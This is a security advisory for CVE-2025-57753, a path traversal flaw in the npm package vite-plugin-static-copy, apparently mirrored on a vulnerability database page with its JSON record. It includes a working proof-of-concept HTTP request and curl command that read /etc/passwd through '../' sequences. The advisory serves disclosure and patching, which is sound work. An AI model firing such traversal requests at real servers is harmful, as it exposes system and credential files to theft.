GHSA-PP7P-Q8FX-2968

Vulnerability from github – Published: 2025-08-21 14:53 – Updated: 2025-08-21 19:16
VLAI?
Summary
vite-plugin-static-copy files not included in `src` are possible to access with a crafted request
Details

Summary

Files not included in src was possible to access with a crafted request.

Impact

Only apps explicitly exposing the Vite dev server to the network (using --host or server.host config option) are affected.

Arbitrary files can be disclosed by exploiting this vulnerability.

Details

Consider the following configuration in used by vite.config.ts:

import { defineConfig } from 'vite'
import { viteStaticCopy } from 'vite-plugin-static-copy'

export default defineConfig({
    plugins: [
      viteStaticCopy({
        targets: [
          {
            src: "./public/images",
            dest: "./",
          },
        ],
      }),
    ],
  });

The files under the ./public/images is only expected to be served. Abusing this vulnerability, an attacker can access arbitrary files on the filesystem.

PoC

I've attached a demo app to showcase the bug.

Run it with npm run dev and issue the following HTTP request

GET /static/images/../../../../../../../etc/passwd HTTP/1.1
Host: localhost:3001
Content-Length: 2

OR 

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: localhost:3001' -H $'Content-Length: 2' \
    --data-binary $'\x0d\x0a' \
    $'http://localhost:3001/static/images/../../../../../../../etc/passwd'

Observe that the /etc/passwd file is included in the response.

Screenshot 2025-08-16 at 10 27 11 PM

Severity ?
6.0 (Medium)
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.1.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vite-plugin-static-copy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "3.0.0"
            },
            {
              "fixed": "3.1.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 2.3.1"
      },
      "package": {
        "ecosystem": "npm",
        "name": "vite-plugin-static-copy"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0.4.3"
            },
            {
              "fixed": "2.3.2"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2025-57753"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-22"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2025-08-21T14:53:52Z",
    "nvd_published_at": "2025-08-21T16:15:34Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\n\nFiles not included in `src` was possible to access with a crafted request.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\nArbitrary files can be disclosed by exploiting this vulnerability.\n\n### Details\n\nConsider the following configuration in used by `vite.config.ts`:\n\n```ts\nimport { defineConfig } from \u0027vite\u0027\nimport { viteStaticCopy } from \u0027vite-plugin-static-copy\u0027\n\nexport default defineConfig({\n    plugins: [\n      viteStaticCopy({\n        targets: [\n          {\n            src: \"./public/images\",\n            dest: \"./\",\n          },\n        ],\n      }),\n    ],\n  });\n```\n\nThe files under the `./public/images` is only expected to be served. Abusing this vulnerability, an attacker can access arbitrary files on the filesystem.\n\n### PoC\nI\u0027ve attached a demo app to showcase the bug.\n\nRun it with `npm run dev` and issue the following HTTP request\n\n```\nGET /static/images/../../../../../../../etc/passwd HTTP/1.1\nHost: localhost:3001\nContent-Length: 2\n```\nOR \n```\ncurl --path-as-is -i -s -k -X $\u0027GET\u0027 \\\n    -H $\u0027Host: localhost:3001\u0027 -H $\u0027Content-Length: 2\u0027 \\\n    --data-binary $\u0027\\x0d\\x0a\u0027 \\\n    $\u0027http://localhost:3001/static/images/../../../../../../../etc/passwd\u0027\n```\nObserve that the `/etc/passwd` file is included in the response.\n\n\u003cimg width=\"1289\" height=\"449\" alt=\"Screenshot 2025-08-16 at 10 27 11\u202fPM\" src=\"https://github.com/user-attachments/assets/4de12612-7b86-44d7-a403-c76f12832e37\" /\u003e",
  "id": "GHSA-pp7p-q8fx-2968",
  "modified": "2025-08-21T19:16:58Z",
  "published": "2025-08-21T14:53:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/security/advisories/GHSA-pp7p-q8fx-2968"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-57753"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/commit/0bc6b49ed72b46eecfc9682045f4b46a19694969"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/commit/4627afb8582083eab733881d3d974e1c1f23997d"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/releases/tag/vite-plugin-static-copy%402.3.2"
    },
    {
      "type": "WEB",
      "url": "https://github.com/sapphi-red/vite-plugin-static-copy/releases/tag/vite-plugin-static-copy%403.1.2"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:P/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "vite-plugin-static-copy files not included in `src` are possible to access with a crafted request"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.